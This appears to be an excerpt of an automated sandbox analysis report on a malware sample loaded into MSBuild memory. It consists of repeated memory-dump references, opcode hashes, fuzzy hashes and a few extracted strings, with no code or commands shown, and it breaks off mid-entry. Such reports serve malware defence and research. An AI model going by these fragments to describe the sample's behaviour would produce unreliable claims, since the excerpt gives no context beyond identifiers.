                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: #
                                                                                                                                                                                                                                                                  • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Actx
                                                                                                                                                                                                                                                                  • API String ID: 0-89312691
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: LdrCreateEnclave
                                                                                                                                                                                                                                                                  • API String ID: 0-3262589265
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%


Memory Dump Source
• Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd

Memory Dump Source
• Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 395a5d570814bd2312111760e1d93a66b8bb41527aab29325988cef30a71fcfd
                                                                                                                                                                                                                                                                  • Instruction ID: c6470256c1a47224c089ab08c4b82e84d3e2d34a212ee044e4c7b485f6f26b30
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 395a5d570814bd2312111760e1d93a66b8bb41527aab29325988cef30a71fcfd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26F1F473E005269BCB59CE68C5A05BEFFF1AF54210B29426AD952EB392D734DE41CB80
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: b8f5637e57134dda7f3fb8d2fad2e2e094c70f1af60f7e6258fc83ec03756961
                                                                                                                                                                                                                                                                  • Instruction ID: 9a70455af4a427856ffa6b0c113a45acb20bc9596edf39decebc4ff8488a072e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8f5637e57134dda7f3fb8d2fad2e2e094c70f1af60f7e6258fc83ec03756961
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE126572909391CFD716DF38C99AB813FB1F792724B08428EC9A1975D6D338215ACF89
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a9f98b95875fc32a276f823d5b735a2b6d0b3aca4df4f48e41d9ace4c108bff4
                                                                                                                                                                                                                                                                  • Instruction ID: 73d7351fc6051cbf71af7434a4b636b7114e7b8ed3cecb38ee914e57e666da8a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9f98b95875fc32a276f823d5b735a2b6d0b3aca4df4f48e41d9ace4c108bff4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFF1407090020ADFDF19DFACC580BAEB7B5FF44308F1485A9EA15AB256E734DA45CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 418d9a0bb13c38021577d5004da84bc26c37a36a223c6629da63a9a2b2c76ee9
                                                                                                                                                                                                                                                                  • Instruction ID: 81de43cca1336cf38d80b5c55a6d7154594d79393af9a23a0e791f667510ecd2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 418d9a0bb13c38021577d5004da84bc26c37a36a223c6629da63a9a2b2c76ee9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADE190B1508342CFC715EF28C490A6ABBE1FF89318F05896DF99997351E731E905CB92
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: fa1ed6a6cd64cd8fc0f55ecc4a04e73124c5cb3a844fcbcbbb8e3529dfbc23d0
                                                                                                                                                                                                                                                                  • Instruction ID: c2eead4a5791a56abd327185e7a59864c6ce3a87f0992337ed9d2ba9bf781fb9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa1ed6a6cd64cd8fc0f55ecc4a04e73124c5cb3a844fcbcbbb8e3529dfbc23d0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CD1F672A0020ADBDB24DF29C884ABEB7B5FF5431CF05466DEA16DB284E738D951CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 746c943184e53b1934f594c990f6d650a5370f6275ff1211c43c7e661e0a3540
                                                                                                                                                                                                                                                                  • Instruction ID: eba585da97ab3d01b5fa0d3079a246584260c101ffd8456a6237e16633096e80
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 746c943184e53b1934f594c990f6d650a5370f6275ff1211c43c7e661e0a3540
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1123072909791CFD712DF38C88AB423FB1F796324B48428EC9A1935D2D738216ADF49
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
Similarity
• API ID: InitializeThunk
• API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: bedec5b1a419b02edda4c04a380503749c0ecbe4a5d62477de05fa4e5e137757
                                                                                                                                                                                                                                                                  • Instruction ID: 3fa4ac5b18b9bdfffba2b64d3fe83dbef55d4766a3a350f1c36636e1eec1ce01
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bedec5b1a419b02edda4c04a380503749c0ecbe4a5d62477de05fa4e5e137757
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7A14B7190061AAFEF229FA8CC45BAE7BB9EF45758F414054FA00AB2A0D7759C41CBA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: c9601dd5e314396cddaa5bc94079e246369a1977dcbf92fc955d811047d9921f
                                                                                                                                                                                                                                                                  • Instruction ID: bc879d21d5634143f9540a97024c6491907c8d6018ed66ac95074f9a3293306f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9601dd5e314396cddaa5bc94079e246369a1977dcbf92fc955d811047d9921f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03C16874208341CFE760DF19C484BABB7E5BF88308F44496DE98997291E774E908CFA2
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
Memory Dump Source
• Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
Memory Dump Source
• Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 85c550d57d7d04e976de9f4033cd2d17a53dcbcbf37ae774952b7b3b7c6bfbf8
                                                                                                                                                                                                                                                                  • Instruction ID: 53517f001437bf9e900a03ab6d3745f836f43bad4553068b7a650f2fb740fb79
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85c550d57d7d04e976de9f4033cd2d17a53dcbcbf37ae774952b7b3b7c6bfbf8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69D15672909786DFD716DF38C98AB823FB5F792324B08438EC9A193496D339211ACF45
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: cb7bd5d65c8a313430503e77cb76a359d2bb4a93e0cae0e1e8ac588988c0062c
                                                                                                                                                                                                                                                                  • Instruction ID: 7bae087556fd260399b5f6f6c66dc915a24b4d8bcc3d193277f9171abd4c5dbf
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb7bd5d65c8a313430503e77cb76a359d2bb4a93e0cae0e1e8ac588988c0062c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27910431A00626DBEF24DB6DC444BBEBBE6EF9471CF154069E905AB390E634D901C791
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 26a2c137fccd69c8e4eb7d5ede47e7558759ee312deb7170de3841cdec03baa2
                                                                                                                                                                                                                                                                  • Instruction ID: 7513f32066b8a855b5db69ef48302a341eb7d6e589f4e169feee7df085ba9c4b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26a2c137fccd69c8e4eb7d5ede47e7558759ee312deb7170de3841cdec03baa2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BAB111B16093418FD754CF28C480A5ABBF5BB88308F184A6EF99AD7352D731E946CB42
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
Memory Dump Source
• Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fa0583962607550099b7c75a24cab8e35058bf41b4b2a49f130791cbb08cfce
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A719878E00722DBDB24CF99D08057AB7F1BB89204B64446FD98297760D371ED89DB92
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                                                                                                                  • Instruction ID: a334fe79b176385a221b6976897c98a4929c4105eed1373f3628e4b3e1a7cd0e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06716E71A00619AFDF11DFAAC944BDEBBB8FF58744F10456AE505E7290DB34EA01CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 5b3c6527675ffc265f6c85039c92e0c3e4049fe7e8cf55852be8f2f7a3bd945a
                                                                                                                                                                                                                                                                  • Instruction ID: ca9353eb7cfd535391955663445d7c976a5f36398b33a7c6469a4fe4d0ae51b3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b3c6527675ffc265f6c85039c92e0c3e4049fe7e8cf55852be8f2f7a3bd945a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D710532240701AFEB32DF18C844F57BBA6FF40724F16452AE25A8B2B4DBB5E944CB54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 66aa06696347aed06f9cb5969fc29288af6bef320ed5fc4737d9b39a534e6cc7
                                                                                                                                                                                                                                                                  • Instruction ID: d91462e2b0de574c65dc2057734ea2a056bf7a785a10a402c8559ef6767081b8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66aa06696347aed06f9cb5969fc29288af6bef320ed5fc4737d9b39a534e6cc7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83516975A001665BEB14DF6DC880ABBBBE2EF88315B14416AEE54DB395DB34C903C7A0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 046a555ec77ec476ebe38b789848e747022f9b7454134664f8d8b2579b711935
                                                                                                                                                                                                                                                                  • Instruction ID: e4bc0cdd3710ca4dfc438e4e8843d2860425e90b708a52c0aa610b9649908904
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 046a555ec77ec476ebe38b789848e747022f9b7454134664f8d8b2579b711935
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B818F75A00205DFDB09CFA9C490AAEBBF1FF88300F1581AAD859EB355D734EA41CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 8ed151684033eb9a17552e323de3ae55d0d694c82952cbb595dc26f7b51048b1
                                                                                                                                                                                                                                                                  • Instruction ID: 6675829504a7edc4af3b81cbacab9cf6eb50873f7bf2e7b58cdb5dcd117c5c4a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ed151684033eb9a17552e323de3ae55d0d694c82952cbb595dc26f7b51048b1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5461F4B1600616AFE715CF69C884BABBBA8FF98318F00461EF95887260DB30E501CBD1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 7e3bfcc1862f1e6c8ef8750098175a135e1edccb6786f1465a4d16b39be742ce
                                                                                                                                                                                                                                                                  • Instruction ID: 6c4f6c87a7406fa65e57f34b9833a875896cc46106bd5f95471dc0e6851aca26
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e3bfcc1862f1e6c8ef8750098175a135e1edccb6786f1465a4d16b39be742ce
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC61C471A0020ADFEB14DF6CC981ABEB7F1FF48314F24452AE555EB2A1D730A91ACB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
